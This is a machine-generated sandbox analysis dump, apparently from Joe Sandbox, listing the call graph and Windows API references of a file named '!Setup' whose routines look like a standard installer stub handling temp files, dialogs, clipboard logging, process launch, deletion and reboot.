3552->3568 3565 40145c 18 API calls 3553->3565 3569 401446 18 API calls 3554->3569 3573 40145c 18 API calls 3555->3573 3587 401446 18 API calls 3556->3587 3556->3624 3557->3624 3678 405f7d wsprintfW 3557->3678 3566 40145c 18 API calls 3558->3566 3571 40145c 18 API calls 3559->3571 3575 401647 PostQuitMessage 3560->3575 3560->3624 3572 4062cf 11 API calls 3561->3572 3562->3563 3576 401765 ShowWindow 3563->3576 3563->3624 3577 401775 3564->3577 3578 401678 3565->3578 3579 40189d 3566->3579 3580 401968 GetFullPathNameW 3567->3580 3581 4017b8 3568->3581 3582 40169a 3569->3582 3570->3624 3583 4018e2 3571->3583 3584 4016c7 SetForegroundWindow 3572->3584 3585 40161c 3573->3585 3586 4019d1 SearchPathW 3574->3586 3575->3624 3576->3624 3590 4062cf 11 API calls 3577->3590 3591 4062cf 11 API calls 3578->3591 3669 406301 FindFirstFileW 3579->3669 3593 4019a1 3580->3593 3594 40197f 3580->3594 3595 4062cf 11 API calls 3581->3595 3596 4062cf 11 API calls 3582->3596 3597 40145c 18 API calls 3583->3597 3584->3624 3598 4062cf 11 API calls 3585->3598 3586->3557 3586->3624 3587->3624 3599 401664 3588->3599 3600 401785 SetFileAttributesW 3590->3600 3601 401683 3591->3601 3613 4019b8 GetShortPathNameW 3593->3613 3593->3624 3594->3593 3619 406301 2 API calls 3594->3619 3603 4017c9 3595->3603 3604 4016a7 Sleep 3596->3604 3605 4018eb 3597->3605 3606 401627 3598->3606 3607 40139d 65 API calls 3599->3607 3608 40179a 3600->3608 3600->3624 3617 404f9e 25 API calls 3601->3617 3651 405d85 CharNextW CharNextW 3603->3651 3604->3624 3614 40145c 18 API calls 3605->3614 3615 404f9e 25 API calls 3606->3615 3607->3624 3616 4062cf 11 API calls 3608->3616 3609 4018c2 3620 4062cf 11 API calls 3609->3620 3610 4018a9 3618 4062cf 11 API calls 3610->3618 3613->3624 3622 4018f5 3614->3622 3615->3624 3616->3624 3617->3624 3618->3624 3623 401991 3619->3623 3620->3624 3621 4017d4 3625 401864 3621->3625 3628 405d32 CharNextW 3621->3628 3646 4062cf 11 API calls 3621->3646 3626 4062cf 11 API calls 3622->3626 3623->3593 3677 406035 lstrcpynW 3623->3677 3624->3522 3625->3601 3627 40186e 3625->3627 3629 401902 MoveFileW 3626->3629 3657 404f9e 3627->3657 3632 4017e6 CreateDirectoryW 3628->3632 3633 401912 3629->3633 3634 40191e 3629->3634 3632->3621 3636 4017fe GetLastError 3632->3636 3633->3601 3640 406301 2 API calls 3634->3640 3650 401942 3634->3650 3638 401827 GetFileAttributesW 3636->3638 3639 40180b GetLastError 3636->3639 3638->3621 3643 4062cf 11 API calls 3639->3643 3644 401929 3640->3644 3641 401882 SetCurrentDirectoryW 3641->3624 3642 4062cf 11 API calls 3645 40195c 3642->3645 3643->3621 3644->3650 3672 406c94 3644->3672 3645->3624 3646->3621 3649 404f9e 25 API calls 3649->3650 3650->3642 3652 405da2 3651->3652 3655 405db4 3651->3655 3654 405daf CharNextW 3652->3654 3652->3655 3653 405dd8 3653->3621 3654->3653 3655->3653 3656 405d32 CharNextW 3655->3656 3656->3655 3658 404fb7 3657->3658 3659 401875 3657->3659 3660 404fd5 lstrlenW 3658->3660 3661 406831 18 API calls 3658->3661 3668 406035 lstrcpynW 3659->3668 3662 404fe3 lstrlenW 3660->3662 3663 404ffe 3660->3663 3661->3660 3662->3659 3664 404ff5 lstrcatW 3662->3664 3665 405011 3663->3665 3666 405004 SetWindowTextW 3663->3666 3664->3663 3665->3659 3667 405017 SendMessageW SendMessageW SendMessageW 3665->3667 3666->3665 3667->3659 3668->3641 3670 4018a5 3669->3670 3671 406317 FindClose 3669->3671 3670->3609 3670->3610 3671->3670 3679 406328 GetModuleHandleA 3672->3679 3676 401936 3676->3649 3677->3593 3678->3624 3680 406340 LoadLibraryA 3679->3680 3681 40634b GetProcAddress 3679->3681 3680->3681 3682 406359 3680->3682 3681->3682 3682->3676 3683 406ac5 lstrcpyW 3682->3683 3684 406b13 GetShortPathNameW 3683->3684 3685 406aea 3683->3685 3686 406b2c 3684->3686 3687 406c8e 3684->3687 3709 405e7c GetFileAttributesW CreateFileW 3685->3709 3686->3687 3690 406b34 WideCharToMultiByte 3686->3690 3687->3676 3689 406af3 CloseHandle GetShortPathNameW 3689->3687 3691 406b0b 3689->3691 3690->3687 3692 406b51 WideCharToMultiByte 3690->3692 3691->3684 3691->3687 3692->3687 3693 406b69 wsprintfA 3692->3693 3694 406831 18 API calls 3693->3694 3695 406b95 3694->3695 3710 405e7c GetFileAttributesW CreateFileW 3695->3710 3697 406ba2 3697->3687 3698 406baf GetFileSize GlobalAlloc 3697->3698 3699 406bd0 ReadFile 3698->3699 3700 406c84 CloseHandle 3698->3700 3699->3700 3701 406bea 3699->3701 3700->3687 3701->3700 3711 405de2 lstrlenA 3701->3711 3704 406c03 lstrcpyA 3707 406c25 3704->3707 3705 406c17 3706 405de2 4 API calls 3705->3706 3706->3707 3708 406c5c SetFilePointer WriteFile GlobalFree 3707->3708 3708->3700 3709->3689 3710->3697 3712 405e23 lstrlenA 3711->3712 3713 405e2b 3712->3713 3714 405dfc lstrcmpiA 3712->3714 3713->3704 3713->3705 3714->3713 3715 405e1a CharNextA 3714->3715 3715->3712 4864 402da5 4865 4030e3 4864->4865 4866 402dac 4864->4866 4867 401446 18 API calls 4866->4867 4868 402db8 4867->4868 4869 402dbf SetFilePointer 4868->4869 4869->4865 4870 402dcf 4869->4870 4870->4865 4872 405f7d wsprintfW 4870->4872 4872->4865 4873 4049a8 GetDlgItem GetDlgItem 4874 4049fe 7 API calls 4873->4874 4879 404c16 4873->4879 4875 404aa2 DeleteObject 4874->4875 4876 404a96 SendMessageW 4874->4876 4877 404aad 4875->4877 4876->4875 4880 404ae4 4877->4880 4883 406831 18 API calls 4877->4883 4878 404cfb 4881 404da0 4878->4881 4882 404c09 4878->4882 4887 404d4a SendMessageW 4878->4887 4879->4878 4891 40487a 5 API calls 4879->4891 4904 404c86 4879->4904 4886 403d6b 19 API calls 4880->4886 4884 404db5 4881->4884 4885 404da9 SendMessageW 4881->4885 4888 403df6 8 API calls 4882->4888 4889 404ac6 SendMessageW SendMessageW 4883->4889 4896 404dc7 ImageList_Destroy 4884->4896 4897 404dce 4884->4897 4902 404dde 4884->4902 4885->4884 4892 404af8 4886->4892 4887->4882 4894 404d5f SendMessageW 4887->4894 4895 404f97 4888->4895 4889->4877 4890 404ced SendMessageW 4890->4878 4891->4904 4898 403d6b 19 API calls 4892->4898 4893 404f48 4893->4882 4903 404f5d ShowWindow GetDlgItem ShowWindow 4893->4903 4899 404d72 4894->4899 4896->4897 4900 404dd7 GlobalFree 4897->4900 4897->4902 4906 404b09 4898->4906 4908 404d83 SendMessageW 4899->4908 4900->4902 4901 404bd6 GetWindowLongW SetWindowLongW 4905 404bf0 4901->4905 4902->4893 4907 40141d 80 API calls 4902->4907 4917 404e10 4902->4917 4903->4882 4904->4878 4904->4890 4909 404bf6 ShowWindow 4905->4909 4910 404c0e 4905->4910 4906->4901 4912 404b65 SendMessageW 4906->4912 4913 404bd0 4906->4913 4915 404b93 SendMessageW 4906->4915 4916 404ba7 SendMessageW 4906->4916 4907->4917 4908->4881 4924 403dc4 SendMessageW 4909->4924 4925 403dc4 SendMessageW 4910->4925 4912->4906 4913->4901 4913->4905 4915->4906 4916->4906 4918 404e54 4917->4918 4921 404e3e SendMessageW 4917->4921 4919 404f1f InvalidateRect 4918->4919 4923 404ecd SendMessageW SendMessageW 4918->4923 4919->4893 4920 404f35 4919->4920 4922 4043d9 21 API calls 4920->4922 4921->4918 4922->4893 4923->4918 4924->4882 4925->4879 4926 4030a9 SendMessageW 4927 4030c2 InvalidateRect 4926->4927 4928 4030e3 4926->4928 4927->4928 3890 4038af #17 SetErrorMode OleInitialize 3891 406328 3 API calls 3890->3891 3892 4038f2 SHGetFileInfoW 3891->3892 3964 406035 lstrcpynW 3892->3964 3894 40391d GetCommandLineW 3965 406035 lstrcpynW 3894->3965 3896 40392f GetModuleHandleW 3897 403947 3896->3897 3898 405d32 CharNextW 3897->3898 3899 403956 CharNextW 3898->3899 3910 403968 3899->3910 3900 403a02 3901 403a21 GetTempPathW 3900->3901 3966 4037f8 3901->3966 3903 403a37 3905 403a3b GetWindowsDirectoryW lstrcatW 3903->3905 3906 403a5f DeleteFileW 3903->3906 3904 405d32 CharNextW 3904->3910 3908 4037f8 11 API calls 3905->3908 3974 4035b3 GetTickCount GetModuleFileNameW 3906->3974 3911 403a57 3908->3911 3909 403a73 3912 403af8 3909->3912 3914 405d32 CharNextW 3909->3914 3950 403add 3909->3950 3910->3900 3910->3904 3917 403a04 3910->3917 3911->3906 3911->3912 4059 403885 3912->4059 3918 403a8a 3914->3918 4066 406035 lstrcpynW 3917->4066 3929 403b23 lstrcatW lstrcmpiW 3918->3929 3930 403ab5 3918->3930 3919 403aed 3922 406113 9 API calls 3919->3922 3920 403bfa 3923 403c7d 3920->3923 3925 406328 3 API calls 3920->3925 3921 403b0d 3924 405ccc MessageBoxIndirectW 3921->3924 3922->3912 3926 403b1b ExitProcess 3924->3926 3928 403c09 3925->3928 3932 406328 3 API calls 3928->3932 3929->3912 3931 403b3f CreateDirectoryW SetCurrentDirectoryW 3929->3931 4067 4067aa 3930->4067 3934 403b62 3931->3934 3935 403b57 3931->3935 3936 403c12 3932->3936 4084 406035 lstrcpynW 3934->4084 4083 406035 lstrcpynW 3935->4083 3940 406328 3 API calls 3936->3940 3943 403c1b 3940->3943 3942 403b70 4085 406035 lstrcpynW 3942->4085 3944 403c69 ExitWindowsEx 3943->3944 3949 403c29 GetCurrentProcess 3943->3949 3944->3923 3948 403c76 3944->3948 3945 403ad2 4082 406035 lstrcpynW 3945->4082 3951 40141d 80 API calls 3948->3951 3953 403c39 3949->3953 4002 405958 3950->4002 3951->3923 3952 406831 18 API calls 3954 403b98 DeleteFileW 3952->3954 3953->3944 3955 403ba5 CopyFileW 3954->3955 3961 403b7f 3954->3961 3955->3961 3956 403bee 3957 406c94 42 API calls 3956->3957 3959 403bf5 3957->3959 3958 406c94 42 API calls 3958->3961 3959->3912 3960 406831 18 API calls 3960->3961 3961->3952 3961->3956 3961->3958 3961->3960 3963 403bd9 CloseHandle 3961->3963 4086 405c6b CreateProcessW 3961->4086 3963->3961 3964->3894 3965->3896 3967 406064 5 API calls 3966->3967 3968 403804 3967->3968 3969 40380e 3968->3969 3970 40674e 3 API calls 3968->3970 3969->3903 3971 403816 CreateDirectoryW 3970->3971 3972 405eab 2 API calls 3971->3972 3973 40382a 3972->3973 3973->3903 4089 405e7c GetFileAttributesW CreateFileW 3974->4089 3976 4035f3 3996 403603 3976->3996 4090 406035 lstrcpynW 3976->4090 3978 403619 4091 40677d lstrlenW 3978->4091 3982 40362a GetFileSize 3983 403726 3982->3983 3997 403641 3982->3997 4096 4032d2 3983->4096 3985 40372f 3987 40376b GlobalAlloc 3985->3987 3985->3996 4108 403368 SetFilePointer 3985->4108 3986 403336 ReadFile 3986->3997 4107 403368 SetFilePointer 3987->4107 3990 4037e9 3993 4032d2 6 API calls 3990->3993 3991 403786 3994 40337f 33 API calls 3991->3994 3992 40374c 3995 403336 ReadFile 3992->3995 3993->3996 4000 403792 3994->4000 3999 403757 3995->3999 3996->3909 3997->3983 3997->3986 3997->3990 3997->3996 3998 4032d2 6 API calls 3997->3998 3998->3997 3999->3987 3999->3996 4000->3996 4000->4000 4001 4037c0 SetFilePointer 4000->4001 4001->3996 4003 406328 3 API calls 4002->4003 4004 40596c 4003->4004 4005 405972 4004->4005 4006 405984 4004->4006 4122 405f7d wsprintfW 4005->4122 4007 405eff 3 API calls 4006->4007 4008 4059b5 4007->4008 4010 4059d4 lstrcatW 4008->4010 4012 405eff 3 API calls 4008->4012 4011 405982 4010->4011 4113 403ec1 4011->4113 4012->4010 4015 4067aa 18 API calls 4016 405a06 4015->4016 4017 405a9c 4016->4017 4019 405eff 3 API calls 4016->4019 4018 4067aa 18 API calls 4017->4018 4020 405aa2 4018->4020 4021 405a38 4019->4021 4022 405ab2 4020->4022 4023 406831 18 API calls 4020->4023 4021->4017 4025 405a5b lstrlenW 4021->4025 4028 405d32 CharNextW 4021->4028 4024 405ad2 LoadImageW 4022->4024 4124 403ea0 4022->4124 4023->4022 4026 405b92 4024->4026 4027 405afd RegisterClassW 4024->4027 4029 405a69 lstrcmpiW 4025->4029 4030 405a8f 4025->4030 4034 40141d 80 API calls 4026->4034 4032 405b9c 4027->4032 4033 405b45 SystemParametersInfoW CreateWindowExW 4027->4033 4035 405a56 4028->4035 4029->4030 4036 405a79 GetFileAttributesW 4029->4036 4038 40674e 3 API calls 4030->4038 4032->3919 4033->4026 4039 405b98 4034->4039 4035->4025 4040 405a85 4036->4040 4037 405ac8 4037->4024 4041 405a95 4038->4041 4039->4032 4042 403ec1 19 API calls 4039->4042 4040->4030 4043 40677d 2 API calls 4040->4043 4123 406035 lstrcpynW 4041->4123 4045 405ba9 4042->4045 4043->4030 4046 405bb5 ShowWindow LoadLibraryW 4045->4046 4047 405c38 4045->4047 4048 405bd4 LoadLibraryW 4046->4048 4049 405bdb GetClassInfoW 4046->4049 4050 405073 83 API calls 4047->4050 4048->4049 4051 405c05 DialogBoxParamW 4049->4051 4052 405bef GetClassInfoW RegisterClassW 4049->4052 4053 405c3e 4050->4053 4056 40141d 80 API calls 4051->4056 4052->4051 4054 405c42 4053->4054 4055 405c5a 4053->4055 4054->4032 4058 40141d 80 API calls 4054->4058 4057 40141d 80 API calls 4055->4057 4056->4032 4057->4032 4058->4032 4060 40389d 4059->4060 4061 40388f CloseHandle 4059->4061 4131 403caf 4060->4131 4061->4060 4066->3901 4184 406035 lstrcpynW 4067->4184 4069 4067bb 4070 405d85 4 API calls 4069->4070 4071 4067c1 4070->4071 4072 406064 5 API calls 4071->4072 4079 403ac3 4071->4079 4075 4067d1 4072->4075 4073 406809 lstrlenW 4074 406810 4073->4074 4073->4075 4077 40674e 3 API calls 4074->4077 4075->4073 4076 406301 2 API calls 4075->4076 4075->4079 4080 40677d 2 API calls 4075->4080 4076->4075 4078 406816 GetFileAttributesW 4077->4078 4078->4079 4079->3912 4081 406035 lstrcpynW 4079->4081 4080->4073 4081->3945 4082->3950 4083->3934 4084->3942 4085->3961 4087 405ca6 4086->4087 4088 405c9a CloseHandle 4086->4088 4087->3961 4088->4087 4089->3976 4090->3978 4092 40678c 4091->4092 4093 406792 CharPrevW 4092->4093 4094 40361f 4092->4094 4093->4092 4093->4094 4095 406035 lstrcpynW 4094->4095 4095->3982 4097 4032f3 4096->4097 4098 4032db 4096->4098 4101 403303 GetTickCount 4097->4101 4102 4032fb 4097->4102 4099 4032e4 DestroyWindow 4098->4099 4100 4032eb 4098->4100 4099->4100 4100->3985 4104 403311 CreateDialogParamW ShowWindow 4101->4104 4105 403334 4101->4105 4109 40635e 4102->4109 4104->4105 4105->3985 4107->3991 4108->3992 4110 40637b PeekMessageW 4109->4110 4111 406371 DispatchMessageW 4110->4111 4112 403301 4110->4112 4111->4110 4112->3985 4114 403ed5 4113->4114 4129 405f7d wsprintfW 4114->4129 4116 403f49 4117 406831 18 API calls 4116->4117 4118 403f55 SetWindowTextW 4117->4118 4119 403f70 4118->4119 4120 403f8b 4119->4120 4121 406831 18 API calls 4119->4121 4120->4015 4121->4119 4122->4011 4123->4017 4130 406035 lstrcpynW 4124->4130 4126 403eb4 4127 40674e 3 API calls 4126->4127 4128 403eba lstrcatW 4127->4128 4128->4037 4129->4116 4130->4126 4132 403cbd 4131->4132 4133 4038a2 4132->4133 4134 403cc2 FreeLibrary GlobalFree 4132->4134 4135 406cc7 4133->4135 4134->4133 4134->4134 4136 4067aa 18 API calls 4135->4136 4137 406cda 4136->4137 4138 406ce3 DeleteFileW 4137->4138 4139 406cfa 4137->4139 4178 4038ae CoUninitialize 4138->4178 4140 406e77 4139->4140 4182 406035 lstrcpynW 4139->4182 4146 406301 2 API calls 4140->4146 4166 406e84 4140->4166 4140->4178 4142 406d25 4143 406d39 4142->4143 4144 406d2f lstrcatW 4142->4144 4147 40677d 2 API calls 4143->4147 4145 406d3f 4144->4145 4149 406d4f lstrcatW 4145->4149 4151 406d57 lstrlenW FindFirstFileW 4145->4151 4148 406e90 4146->4148 4147->4145 4152 40674e 3 API calls 4148->4152 4148->4178 4149->4151 4150 4062cf 11 API calls 4150->4178 4155 406e67 4151->4155 4179 406d7e 4151->4179 4153 406e9a 4152->4153 4156 4062cf 11 API calls 4153->4156 4154 405d32 CharNextW 4154->4179 4155->4140 4157 406ea5 4156->4157 4158 405e5c 2 API calls 4157->4158 4159 406ead RemoveDirectoryW 4158->4159 4163 406ef0 4159->4163 4164 406eb9 4159->4164 4160 406e44 FindNextFileW 4162 406e5c FindClose 4160->4162 4160->4179 4162->4155 4165 404f9e 25 API calls 4163->4165 4164->4166 4167 406ebf 4164->4167 4165->4178 4166->4150 4169 4062cf 11 API calls 4167->4169 4168 4062cf 11 API calls 4168->4179 4170 406ec9 4169->4170 4173 404f9e 25 API calls 4170->4173 4171 406cc7 72 API calls 4171->4179 4172 405e5c 2 API calls 4174 406dfa DeleteFileW 4172->4174 4175 406ed3 4173->4175 4174->4179 4176 406c94 42 API calls 4175->4176 4176->4178 4177 404f9e 25 API calls 4177->4160 4178->3920 4178->3921 4179->4154 4179->4160 4179->4168 4179->4171 4179->4172 4179->4177 4180 404f9e 25 API calls 4179->4180 4181 406c94 42 API calls 4179->4181 4183 406035 lstrcpynW 4179->4183 4180->4179 4181->4179 4182->4142 4183->4179 4184->4069 4929 401cb2 4930 40145c 18 API calls 4929->4930 4931 401c54 4930->4931 4932 4062cf 11 API calls 4931->4932 4933 401c64 4931->4933 4934 401c59 4932->4934 4935 406cc7 81 API calls 4934->4935 4935->4933 3716 4021b5 3717 40145c 18 API calls 3716->3717 3718 4021bb 3717->3718 3719 40145c 18 API calls 3718->3719 3720 4021c4 3719->3720 3721 40145c 18 API calls 3720->3721 3722 4021cd 3721->3722 3723 40145c 18 API calls 3722->3723 3724 4021d6 3723->3724 3725 404f9e 25 API calls 3724->3725 3726 4021e2 ShellExecuteW 3725->3726 3727 40221b 3726->3727 3728 40220d 3726->3728 3729 4062cf 11 API calls 3727->3729 3730 4062cf 11 API calls 3728->3730 3731 402230 3729->3731 3730->3727 4936 402238 4937 40145c 18 API calls 4936->4937 4938 40223e 4937->4938 4939 4062cf 11 API calls 4938->4939 4940 40224b 4939->4940 4941 404f9e 25 API calls 4940->4941 4942 402255 4941->4942 4943 405c6b 2 API calls 4942->4943 4944 40225b 4943->4944 4945 4062cf 11 API calls 4944->4945 4953 4022ac CloseHandle 4944->4953 4950 40226d 4945->4950 4947 4030e3 4948 402283 WaitForSingleObject 4949 402291 GetExitCodeProcess 4948->4949 4948->4950 4952 4022a3 4949->4952 4949->4953 4950->4948 4951 40635e 2 API calls 4950->4951 4950->4953 4951->4948 4955 405f7d wsprintfW 4952->4955 4953->4947 4955->4953 4956 404039 4957 404096 4956->4957 4958 404046 lstrcpynA lstrlenA 4956->4958 4958->4957 4959 404077 4958->4959 4959->4957 4960 404083 GlobalFree 4959->4960 4960->4957 4961 401eb9 4962 401f24 4961->4962 4965 401ec6 4961->4965 4963 401f53 GlobalAlloc 4962->4963 4967 401f28 4962->4967 4969 406831 18 API calls 4963->4969 4964 401ed5 4968 4062cf 11 API calls 4964->4968 4965->4964 4971 401ef7 4965->4971 4966 401f36 4985 406035 lstrcpynW 4966->4985 4967->4966 4970 4062cf 11 API calls 4967->4970 4980 401ee2 4968->4980 4973 401f46 4969->4973 4970->4966 4983 406035 lstrcpynW 4971->4983 4975 402708 4973->4975 4976 402387 GlobalFree 4973->4976 4976->4975 4977 401f06 4984 406035 lstrcpynW 4977->4984 4978 406831 18 API calls 4978->4980 4980->4975 4980->4978 4981 401f15 4986 406035 lstrcpynW 4981->4986 4983->4977 4984->4981 4985->4973 4986->4975

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                APIs
                                                                                • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                  • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                  • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00427976,74DF23A0,00000000), ref: 00406902
                                                                                  • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                  • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                • ShowWindow.USER32(00000000), ref: 00405313
                                                                                • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                • CreatePopupMenu.USER32 ref: 004053A2
                                                                                • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                • EmptyClipboard.USER32 ref: 0040543D
                                                                                • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                • CloseClipboard.USER32 ref: 0040549A
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1702730947.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702670469.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702756426.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004A3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1702779263.00000000004C3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703028332.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_!Setup.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                • String ID: New install of "%s" to "%s"${
                                                                                • API String ID: 2110491804-1641061399
                                                                                • Opcode ID: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                • Opcode Fuzzy Hash: bcb774d99f95268555e073945e74a63dc3a3de547f83199e57bf6b1f44cb798b
                                                                                • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 